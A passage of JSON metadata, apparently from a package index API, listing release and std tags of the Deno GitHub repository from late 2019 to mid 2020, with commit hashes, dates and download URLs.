03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_a